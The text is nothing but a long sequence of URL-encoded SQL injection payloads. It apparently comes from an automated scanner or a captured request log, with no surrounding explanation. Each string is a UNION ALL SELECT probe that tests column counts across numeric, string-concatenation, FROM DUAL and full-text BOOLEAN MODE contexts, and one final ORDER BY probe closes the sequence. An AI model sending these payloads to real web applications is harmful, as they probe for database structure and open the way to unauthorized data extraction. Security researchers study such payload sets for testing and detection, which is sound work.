-2401%20WHERE%206792%3D6792%20UNION%20ALL%20SELECT%206792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%2C6792%23 -3351%20WHERE%201317%3D1317%20UNION%20ALL%20SELECT%201317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%23 -9397%20WHERE%206678%3D6678%20UNION%20ALL%20SELECT%206678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%23 -3972%27%7C%7C%28SELECT%20%27TQgv%27%20FROM%20DUAL%20WHERE%207032%3D7032%20UNION%20ALL%20SELECT%207032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%2C7032%23 -4294%27%7C%7C%28SELECT%20%27yrqT%27%20FROM%20DUAL%20WHERE%207231%3D7231%20UNION%20ALL%20SELECT%207231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%23 -2935%27%7C%7C%28SELECT%20%27apGp%27%20FROM%20DUAL%20WHERE%204913%3D4913%20UNION%20ALL%20SELECT%204913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%2C4913%23 -4137%27%7C%7C%28SELECT%20%27cuGx%27%20FROM%20DUAL%20WHERE%204185%3D4185%20UNION%20ALL%20SELECT%204185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%23 -8820%27%7C%7C%28SELECT%20%27xdPY%27%20FROM%20DUAL%20WHERE%202986%3D2986%20UNION%20ALL%20SELECT%202986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%2C2986%23 -2700%27%7C%7C%28SELECT%20%27ZBHa%27%20FROM%20DUAL%20WHERE%201296%3D1296%20UNION%20ALL%20SELECT%201296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%2C1296%23 -4619%27%7C%7C%28SELECT%20%27aBDD%27%20FROM%20DUAL%20WHERE%209340%3D9340%20UNION%20ALL%20SELECT%209340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%2C9340%23 -6813%27%7C%7C%28SELECT%20%27fZQn%27%20FROM%20DUAL%20WHERE%203016%3D3016%20UNION%20ALL%20SELECT%203016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%2C3016%23 -4697%27%7C%7C%28SELECT%20%27RDAl%27%20FROM%20DUAL%20WHERE%203917%3D3917%20UNION%20ALL%20SELECT%203917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%23 -3350%27%7C%7C%28SELECT%20%27kJLG%27%20FROM%20DUAL%20WHERE%201057%3D1057%20UNION%20ALL%20SELECT%201057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%2C1057%23 -9186%27%7C%7C%28SELECT%20%27jBbs%27%20WHERE%203315%3D3315%20UNION%20ALL%20SELECT%203315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%2C3315%23 -7673%27%7C%7C%28SELECT%20%27RJdD%27%20WHERE%203983%3D3983%20UNION%20ALL%20SELECT%203983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983%23 -8910%27%7C%7C%28SELECT%20%27ULXd%27%20WHERE%209798%3D9798%20UNION%20ALL%20SELECT%209798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%2C9798%23 -7797%27%7C%7C%28SELECT%20%27FaUW%27%20WHERE%209508%3D9508%20UNION%20ALL%20SELECT%209508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%23 -8583%27%7C%7C%28SELECT%20%27TXua%27%20WHERE%204401%3D4401%20UNION%20ALL%20SELECT%204401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%23 -5565%27%7C%7C%28SELECT%20%27YqAH%27%20WHERE%201103%3D1103%20UNION%20ALL%20SELECT%201103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%23 -7981%27%7C%7C%28SELECT%20%27hGda%27%20WHERE%204476%3D4476%20UNION%20ALL%20SELECT%204476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%2C4476%23 -8186%27%7C%7C%28SELECT%20%27nDzE%27%20WHERE%206082%3D6082%20UNION%20ALL%20SELECT%206082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%23 -4985%27%7C%7C%28SELECT%20%27TlIe%27%20WHERE%205945%3D5945%20UNION%20ALL%20SELECT%205945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%23 -5814%27%7C%7C%28SELECT%20%27SQLw%27%20WHERE%206667%3D6667%20UNION%20ALL%20SELECT%206667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%2C6667%23 -7544%27%2B%28SELECT%20TVLr%20WHERE%207253%3D7253%20UNION%20ALL%20SELECT%207253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%23 -6774%27%2B%28SELECT%20ZXPy%20WHERE%203309%3D3309%20UNION%20ALL%20SELECT%203309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%2C3309%23 -2220%27%2B%28SELECT%20NYmR%20WHERE%203717%3D3717%20UNION%20ALL%20SELECT%203717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%23 -5330%27%2B%28SELECT%20FPkX%20WHERE%203194%3D3194%20UNION%20ALL%20SELECT%203194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%2C3194%23 -3487%27%2B%28SELECT%20xSNR%20WHERE%203518%3D3518%20UNION%20ALL%20SELECT%203518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%2C3518%23 -7132%27%2B%28SELECT%20mrzJ%20WHERE%208380%3D8380%20UNION%20ALL%20SELECT%208380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%23 -9331%27%2B%28SELECT%20encG%20WHERE%203782%3D3782%20UNION%20ALL%20SELECT%203782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%2C3782%23 -6374%27%2B%28SELECT%20ydwQ%20WHERE%209253%3D9253%20UNION%20ALL%20SELECT%209253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%2C9253%23 -3013%27%2B%28SELECT%20gMcJ%20WHERE%205009%3D5009%20UNION%20ALL%20SELECT%205009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%2C5009%23 -3191%27%2B%28SELECT%20MaUA%20WHERE%209989%3D9989%20UNION%20ALL%20SELECT%209989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%2C9989%23 -5505%27%2B%28SELECT%20%27QNYD%27%20WHERE%203119%3D3119%20UNION%20ALL%20SELECT%203119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%2C3119%23 -7814%27%2B%28SELECT%20%27hwmW%27%20WHERE%201090%3D1090%20UNION%20ALL%20SELECT%201090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%23 -8006%27%2B%28SELECT%20%27ZznD%27%20WHERE%203245%3D3245%20UNION%20ALL%20SELECT%203245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%2C3245%23 -7311%27%2B%28SELECT%20%27lJQY%27%20WHERE%208867%3D8867%20UNION%20ALL%20SELECT%208867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%2C8867%23 -3413%27%2B%28SELECT%20%27INHl%27%20WHERE%208266%3D8266%20UNION%20ALL%20SELECT%208266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%2C8266%23 -7331%27%2B%28SELECT%20%27peST%27%20WHERE%208220%3D8220%20UNION%20ALL%20SELECT%208220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%23 -6534%27%2B%28SELECT%20%27GCtC%27%20WHERE%202999%3D2999%20UNION%20ALL%20SELECT%202999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%23 -2307%27%2B%28SELECT%20%27cRcL%27%20WHERE%207657%3D7657%20UNION%20ALL%20SELECT%207657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%2C7657%23 -4731%27%2B%28SELECT%20%27hQIC%27%20WHERE%205874%3D5874%20UNION%20ALL%20SELECT%205874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%23 -5983%27%2B%28SELECT%20%27Voey%27%20WHERE%209222%3D9222%20UNION%20ALL%20SELECT%209222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%2C9222%23 -1232%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%23 -3238%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%2C7135%23 -9868%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%23 -9429%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%23 -4977%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%2C6383%23 -5806%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%23 -4323%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%2C9153%23 -1288%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%2C1738%23 -5684%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%23 -5816%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%2C8381%23 1234.5%29%20ORDER%20BY%201--%20 